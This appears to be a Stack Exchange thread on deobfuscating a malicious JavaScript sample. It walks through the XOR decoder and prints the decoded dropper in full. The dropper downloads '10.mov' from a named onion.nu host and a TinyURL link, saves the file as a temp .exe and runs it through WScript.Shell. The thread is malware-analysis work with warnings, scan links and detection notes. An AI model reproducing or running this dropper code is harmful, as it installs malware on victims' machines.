How to deobfuscate suspicious JavaScript code?

The procedure for dealing with obfuscated JavaScript is very similar to how you deal with it in PHP. In this case, the real action is going on in this line:

// The decoder. The generated function splits its input into runs of five non-whitespace
// characters, takes the characters at index 3 and 4 of each run as a hex byte, XORs that
// byte with 76 and appends the resulting character to tgrdm. The four tljsw() calls are
// concatenated to form the name of the function that is then applied to the decoded text.
uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}"+tljsw()+tljsw()+tljsw()+tljsw()+"(tgrdm);")(abisr));

An anonymous function is created from the long string of code, and that function in turn creates new code by picking characters from the long banks of seemingly random text at the top. At the end you have four function calls:

tljsw()+tljsw()+tljsw()+tljsw()

That function returns one of the letters e, v, l and a at random, so sometimes the four calls together spell eval. That would execute the decoded code, but we don't want to do that — we just want to read the code. So let's replace the four calls with console.log:

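// Same decoder as above, with the four tljsw() calls replaced by a fixed "console.log" so
// the decoded text is printed instead of executed. The function name must be spelled
// exactly "console" — any extra character makes the generated code throw a ReferenceError
// instead of printing.
uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}console.log(tgrdm);")(abisr));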

We then get the following output:

// Download stage of the dropper. Performs a synchronous HTTP GET through the
// MSXML2.XMLHTTP ActiveX control, so it only works where ActiveX is scriptable
// (legacy IE / Windows Script Host, per the discussion below).
// On HTTP 200 the raw ResponseBody is passed to callback(data, false); any
// other status, and any exception (including ActiveXObject not existing),
// is reported as callback(null, true). Nothing is ever surfaced to the user.
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false); // false = synchronous; blocks until the response arrives
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false); // ResponseBody: the raw bytes, not responseText
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true); // swallowed: a blocked request looks the same as a non-200
    }
}

// Fallback chain for the payload download. Each attempt runs only if the
// previous one reported an error: first the TinyURL redirect, then the direct
// onion.nu host, then the same TinyURL redirect again. The first successful
// body is handed to callback(data, false); if all three fail, callback(null, true).
// The split "tiny" + "url" literal is the poster's edit (see the note below
// the listing), not part of the original sample.
function getData(callback) {
    try {
        getDataFromUrl("http://tiny" + "url.com/he3bh27", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                // attempt 2: the direct host
                getDataFromUrl("http://oamnohndpiwpicgm.onion.nu/10.mov", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        // attempt 3: the redirector again
                        getDataFromUrl("http://tiny" + "url.com/he3bh27", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

// Chooses where the payload is dropped. GetSpecialFolder(2) is the
// FileSystemObject TemporaryFolder constant, and the file name is a random
// base-36 string (Math.random() with its "0." prefix stripped) plus ".exe" —
// so the fetched "10.mov" lands on disk as an executable. Returns the full
// path, or false if the FileSystemObject control cannot be created.
function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe"; // leading backslash is the path separator
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false; // callers treat a falsy path as "give up"
    }
}

// Writes the downloaded bytes to the temp .exe using ADODB.Stream.
// Type = 1 is adTypeBinary (the body is raw bytes, so no text conversion);
// SaveToFile(path, 2) is adSaveCreateOverWrite, so an existing file at that
// path is silently replaced. On success callback(path, false) hands the
// on-disk path to the caller; if no path could be chosen or anything throws,
// callback(null, true).
function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1; // adTypeBinary
            objStream.Write(data);
            objStream.Position = 0; // rewind to the start before saving
            objStream.SaveToFile(path, 2); // adSaveCreateOverWrite
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
// Entry point: download -> write to <TemporaryFolder>\<random>.exe -> execute.
// WScript.Shell.Run launches the freshly written file; the empty catch means a
// blocked or failed launch gives the user no sign that anything happened.
// For defenders: script that chains MSXML2.XMLHTTP, ADODB.Stream.SaveToFile and
// WScript.Shell.Run is a classic download-and-execute dropper; the .exe written
// to the temp folder and then launched is the host artefact to look for.
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {} // deliberately silent
            }
        });
    }
});

I don't know what that code does, but the second I copy-pasted it into a text editor my antivirus started screaming about it... As LegionMammal978 points out in the comments, this seems to target IE browsers with a bad configuration, but to be on the safe side you could assume that the computer this was run on is infected by malware and treat it as such.

(Note that I had to split the URLs into "tiny" + "url" because Stack Exchange does not let you post that URL... This should not change the behaviour of the code, though.)


This code tries to download a malicious file, 10.mov, from the address below and execute it (via IE ActiveX); it is possibly some kind of ransomware:

DON'T DOWNLOAD FROM THIS ADDRESS!

xxxx://oamnohndpiwpicgm.onion.nu/10.mov  

https://virustotal.com/en/url/f6aaa537b8f636b7827e08806bf6a8512b5c6497b82e457615cec15a62e2f044/analysis/

Here is the de-obfuscated code:

// Download stage: a synchronous HTTP GET through the MSXML2.XMLHTTP ActiveX
// control, so it only runs where ActiveX is scriptable (legacy IE / Windows
// Script Host). HTTP 200 yields callback(<raw ResponseBody>, false); any other
// status or any exception — including ActiveXObject being undefined — yields
// callback(null, true). Failures are never shown to the user.
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false); // third argument false: synchronous request
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false); // raw bytes, not responseText
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true); // swallowed
    }
}
// Fallback chain for the payload download; each attempt runs only if the
// previous one reported an error. In this transcript the first and third URL
// strings are empty (apparently blanked by the poster — the other answer shows
// a TinyURL redirect there), so only the middle attempt names a host, the
// onion.nu address listed above. The first successful body is passed to
// callback(data, false); if all three attempts fail, callback(null, true).
function getData(callback) {
    try {
        getDataFromUrl("", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                // attempt 2: the direct host
                getDataFromUrl("http://oamnohndpiwpicgm.onion.nu/10.mov", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        // attempt 3: URL blanked in this transcript
                        getDataFromUrl("", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}
// Picks the drop location: GetSpecialFolder(2) is the FileSystemObject
// TemporaryFolder constant, and the name is a random base-36 string
// (Math.random() minus its "0." prefix, up to 9 characters) with a ".exe"
// extension — the downloaded "10.mov" is therefore stored as an executable.
// Returns the path, or false when the FileSystemObject control is unavailable.
function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe"; // "\\" is a single backslash separator
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false; // the caller treats a falsy path as failure
    }
}
// Persists the downloaded bytes to the temp .exe through ADODB.Stream.
// Type = 1 (adTypeBinary) keeps the body as raw bytes; SaveToFile(path, 2)
// (adSaveCreateOverWrite) replaces any existing file at that path. Reports
// callback(path, false) on success, callback(null, true) if no path was
// available or any step threw.
function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1; // adTypeBinary
            objStream.Write(data);
            objStream.Position = 0; // rewind before writing the file
            objStream.SaveToFile(path, 2); // adSaveCreateOverWrite
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
// Entry point: download, write to <TemporaryFolder>\<random>.exe, then launch
// it with WScript.Shell.Run. The empty catch hides a blocked or failed launch.
// Detection note: the chain MSXML2.XMLHTTP -> ADODB.Stream.SaveToFile ->
// WScript.Shell.Run from script is the standard download-and-execute dropper
// shape; watch for a new .exe in the temp folder followed immediately by its
// execution from a script host or browser process.
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {} // intentionally silent
            }
        });
    }
});

Here is a VirusTotal report on that file (Fordanskede.exe):

https://www.virustotal.com/en/file/8991ce3e98dd732dafedd22723c51212278717e6d9583244bda5d1d178ba08d0/analysis/1484576109/

Another report, from running the file in a sandbox:

https://www.hybrid-analysis.com/sample/8991ce3e98dd732dafedd22723c51212278717e6d9583244bda5d1d178ba08d0?environmentId=100


Here is the "encrypted part" of the code:

BE CAREFUL THIS IS AN ACTUAL EXPLOIT CODE AND CAN BE HARMFUL TO YOUR COMPUTER

// The same dropper as the formatted listing above (fetch via MSXML2.XMLHTTP, write to a
// random <TemporaryFolder>\*.exe via ADODB.Stream, launch via WScript.Shell.Run), minified
// onto one line. Two things to note before feeding it to a beautifier: each URL literal
// contains a stray quote ("onion."nu/10.mov") that makes the line a syntax error as
// pasted — presumably inserted to defang the link — and all three download attempts here
// name the onion.nu host, whereas the other transcripts on this page show a TinyURL
// redirect (or an empty string) for the first and third attempts.
function getDataFromUrl(url, callback){try{var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");xmlHttp.open("GET", url, false);xmlHttp.send();if (xmlHttp.status == 200) {return callback(xmlHttp.ResponseBody, false);}else{return callback(null, true);}}catch (error){return callback(null, true);}}function getData(callback){try{getDataFromUrl("http://oamnohndpiwpicgm.onion."nu/10.mov", function(result, error) {if (!error){return callback(result, false);}else{getDataFromUrl("http://oamnohndpiwpicgm.onion."nu/10.mov", function(result, error) {if (!error){return callback(result, false);}else{getDataFromUrl("http://oamnohndpiwpicgm.onion."nu/10.mov", function(result, error) {if (!error){return callback(result, false);}else{return callback(null, true);}});}});}});}catch (error){return callback(null, true);}}function getTempFilePath(){try{var fs = new ActiveXObject("Scripting.FileSystemObject");var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;return tmpFilePath;}catch (error){return false;}}function saveToTemp(data, callback){try{var path = getTempFilePath();if (path){var objStream = new ActiveXObject("ADODB.Stream");objStream.Open();objStream.Type = 1;objStream.Write(data);objStream.Position = 0;objStream.SaveToFile(path, 2);objStream.Close();return callback(path, false);}else {return callback(null, true);}}catch (error){return callback(null, true);}}getData(function (data, error) {if (!error){saveToTemp(data, function (path, error) {if (!error){try{var wsh = new ActiveXObject("WScript.Shell");wsh.Run(path);}catch (error) {}}});}});

This will download an infected .mov file, which is detected by any good antivirus.

Edit: Since it used the TinyURL service, I have contacted them to delete the link.